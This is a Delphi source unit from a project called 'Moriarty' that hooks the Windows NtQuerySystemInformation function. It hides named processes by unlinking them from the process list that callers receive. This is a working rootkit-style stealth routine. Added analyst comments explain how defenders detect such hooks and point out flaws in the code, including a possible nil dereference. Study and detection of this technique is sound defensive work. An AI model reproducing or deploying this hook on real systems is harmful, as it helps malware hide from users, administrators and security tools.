unit uNtQuerySystemInformation;
(*
- NtQuerySystemInformation Hook (the header originally read "NtQueryDirectoryFile Hook"; the unit name and the exported function below both refer to NtQuerySystemInformation)
- Moriarty
- Checks whether a process on the hide list appears in the process list; if so, it is unlinked from the list.
- [Process Hide]
*)
interface
uses Windows, uNTConstants, LOMLib;
type
PProcessInfo = ^TProcessInfo;
// Hand-written view of one entry in the buffer returned by
// NtQuerySystemInformation for information class 5 (SystemProcessInformation).
// NOTE(review): the layout appears to mirror the undocumented 32-bit
// SYSTEM_PROCESS_INFORMATION structure; it is not validated against any
// header and the dwUnkownN fields are padding whose meaning is not known here.
// Only dwOffset and pszProcessName are read or written by the hook in this unit.
TProcessInfo = record
dwOffset: dword; // an offset to the next Process structure (0 marks the last entry)
dwThreadCount: dword;
dwUnkown1: array[0..5] of dword;
ftCreationTime: TFileTime;
dwUnkown2: dword;
dwUnkown3: dword;
dwUnkown4: dword;
dwUnkown5: dword;
dwUnkown6: dword;
pszProcessName: PWideChar; // image name; compared against the hide list
dwBasePriority: dword;
dwProcessID: dword;
dwParentProcessID: dword;
dwHandleCount: dword;
dwUnkown7: dword;
dwUnkown8: dword;
dwVirtualBytesPeak: dword;
dwVirtualBytes: dword;
dwPageFaults: dword;
dwWorkingSetPeak: dword;
dwWorkingSet: dword;
dwUnkown9: dword;
dwPagedPool: dword; // kbytes
dwUnkown10: dword;
dwNonPagedPool: dword; // kbytes
dwPageFileBytesPeak: dword;
dwPageFileBytes: dword;
dwPrivateBytes: dword;
dwUnkown11: dword;
dwUnkown12: dword;
dwUnkown13: dword;
dwUnkown14: dword;
ThreadInfo: dword; // Thread list
end;
var
// Pointer to the original NtQuerySystemInformation (or a trampoline to it).
// It is never assigned inside this unit; the hook installer is expected to
// set it before HookNtQuerySystemInformation is ever reached, otherwise the
// first call dereferences a nil function pointer.
MainNtQuerySystemInformation: function(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
// List of image names to unlink from SystemProcessInformation results.
// Populated elsewhere; matching is an exact, case-sensitive string compare.
szProcessHide : TStrList;
// Replacement for NtQuerySystemInformation; same signature so it can be
// substituted for the original entry point.
function HookNtQuerySystemInformation(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
implementation
{const
hide_process = 'chrome.exe';}
(******************************************************************************************************************************************)
// Hook body for NtQuerySystemInformation.
//
// Behaviour as written: calls the saved original first, and for a successful
// SystemProcessInformation (class 5) query walks the returned entry chain and
// unlinks every entry whose image name is on szProcessHide by folding its
// dwOffset into the previous visible entry. Every other information class and
// every failing call is passed through untouched.
//
// Analyst notes (what a defender should know about this routine):
// - Unlinking is done in place; hidden entries are not zeroed and retlen is
//   not adjusted, so their bytes remain in the caller's buffer after the
//   chain is cut. Comparing the linked view with the raw buffer, or with an
//   independent enumeration source, is the usual way this class of hook is
//   detected.
// - The hook trusts the buffer completely: bufsize is never consulted while
//   walking, and pszProcessName is not nil-checked before conversion.
// - LastPinfo is nil until the first visible entry has been seen, so a hidden
//   name that matches the very first entry dereferences nil at the
//   LastPinfo^.dwOffset writes below.
function HookNtQuerySystemInformation(dt: dword; buf: pointer; bufsize: dword; retlen: pointer): dword; stdcall;
type
// 1,000,000-byte array type used only so the buffer can be byte-indexed;
// the bound is never checked against bufsize.
TBA = array[0..1000000] of byte;
PBA = ^TBA;
var
tmpbuf: PBA;                    // buf reinterpreted for byte offsets
Pinfo, LastPinfo: PProcessInfo; // current entry / last entry left visible
cp: DWORD;                      // byte offset of the current entry within buf
curproc: string;                // current entry's image name as an Ansi string
i: integer;
bHideProcess: Boolean;
begin
// Let the real function fill the buffer first; the hook only post-processes.
Result := MainNtQuerySystemInformation(dt, buf, bufsize, retlen);
// 5 = SystemProcessInformation; every other class is passed through.
if dt <> 5 then exit;
// Only a STATUS_SUCCESS (0) result carries a buffer worth walking.
if result <> 0 then exit;
cp := 0;
tmpbuf := buf; LastPinfo := nil;
repeat
Pinfo := PProcessInfo(@tmpbuf[cp]);
// NOTE(review): no nil check on pszProcessName before conversion.
curproc := WideCharToString(pinfo^.pszProcessName);
bHideProcess := false;
// Exact, case-sensitive match against the hide list.
for i := 0 to szProcessHide.Count - 1 do
begin
if curproc = szProcessHide.Strings[i] then
begin
bHideProcess := true; Break;
end;
end;
//if Pos(hide_process, curproc) > 0 then bHideProcess := true;
if bHideProcess = true then
begin
// Hidden entry: splice it out of the chain by editing the previous
// visible entry's dwOffset. LastPinfo is nil if this is the first entry.
if pinfo^.dwOffset = 0 then
begin
// Hidden entry is the last one: terminate the chain at the previous entry.
LastPinfo^.dwOffset := 0; exit;
end
else
// Skip over this entry: previous entry now points past it.
LastPinfo^.dwOffset := LastPinfo^.dwOffset + pinfo.dwOffset;
end else
begin
// Visible entry: it becomes the predecessor for any later splice.
LastPinfo := Pinfo;
end;
// Advance by the entry's own (unmodified) offset; 0 ends the walk.
cp := cp + Pinfo^.dwOffset;
until Pinfo^.dwOffset = 0;
end;
(******************************************************************************************************************************************)
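// Unit terminator. A stray forum markup tag ("[/i]") had been fused onto this
// line by the page extraction; it is not Pascal and would not compile.
end.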